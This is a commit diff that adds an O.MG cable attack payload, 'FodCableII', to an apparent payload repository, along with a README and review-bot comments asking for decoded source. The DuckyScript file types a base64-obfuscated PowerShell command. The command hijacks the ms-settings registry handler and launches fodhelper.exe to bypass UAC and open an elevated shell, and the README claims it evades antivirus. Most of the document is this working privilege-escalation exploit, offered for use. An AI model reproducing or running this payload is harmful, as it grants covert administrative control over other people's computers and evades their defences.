mirror of https://github.com/hak5/omg-payloads.git
commit
60459f46c9
|
@ -0,0 +1,12 @@
|
|||
**Title: FodCableII - UAC Bypass**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
Version: 1.0<br>
|
||||
Requirements: OMG Firmware v.2.5 or higher</p>
|
||||
|
||||
**What is FodCableII?**
|
||||
#
|
||||
*Use your O.MG Cable / Plug to bypass UAC using one of the Fodhelper.exe methods.*
|
||||
*This POC will get you an elevated powershell instance and won't trigger AV at 04/2022*
|
||||
#
|
||||
!CleanUp will execute directly after execution!
|
|
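Review bot: The line "!CleanUp will execute directly after execution!" does not say what is cleaned up, and the README never lists what the payload changes on the host, so a tester or defender cannot verify that the machine is back in its original state. Please list the changes the payload makes and what the cleanup step removes. The statement "won't trigger AV at 04/2022" names no product or configuration and should be worded as a point-in-time observation rather than a guarantee. On style, the bare `#` lines render as empty headings and the `<p>`/`<br>` block mixes raw HTML into Markdown; a horizontal rule and a plain list would be cleaner.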
@ -0,0 +1,22 @@
|
|||
REM FodCableII
|
||||
REM Version 1.0
|
||||
REM OS: Windows
|
||||
REM Author: 0iphor13
|
||||
REM Requirements: OMG Firmware v.2.5 or higher
|
||||
|
||||
REM Using FodHelper.exe to bypass UAC and get an elevated shell
|
||||
|
||||
DELAY 500
|
||||
DUCKY_LANG de
|
||||
DELAY 1500
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -NoP -NonI
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING powershell.exe -enc JABPAE0ARwA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBDAFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwALgBvAG0AZwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAvAGQAIAAkAE8ATQBHACAALwBmADsADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBD
|
||||
STRING AFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwAbQBzAC0AcwBlAHQAdABpAG4AZwBzAFwAQwB1AHIAVgBlAHIAIgAgAC8AZAAgACIALgBvAG0AZwAiACAALwBmADsADQAKAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUADQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AcwAgADMAOwANAAoAcgBlAGcAIABkAGUAbABlAHQAZQAgACIASABLAEMAVQBcAFMAbwBmAHQAdwBh
|
||||
STRING AHIAZQBcAEMAbABhAHMAcwBlAHMAXAAuAG8AbQBnAFwAIgAgAC8AZgA7AA0ACgByAGUAZwAgAGQAZQBsAGUAdABlACAAIgBIAEsAQwBVAFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcACIAIAAvAGYAOwANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMwA7ACAAZQB4AGkAdAA=;exit
|
||||
DELAY 200
|
||||
ENTER
|
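Review bot: The three STRING lines that carry the `-enc` argument are an opaque base64 blob, so nobody reading this file can tell what the script does to the host or whether the cleanup promised in the README is complete. Please commit the decoded script alongside the payload, or summarise each step in REM lines above the STRING block, so the change can be reviewed as source. `DUCKY_LANG de` is also hard-coded without a REM explaining it, and the header only says "OS: Windows"; the layout assumption belongs in the header comments and in the README requirements.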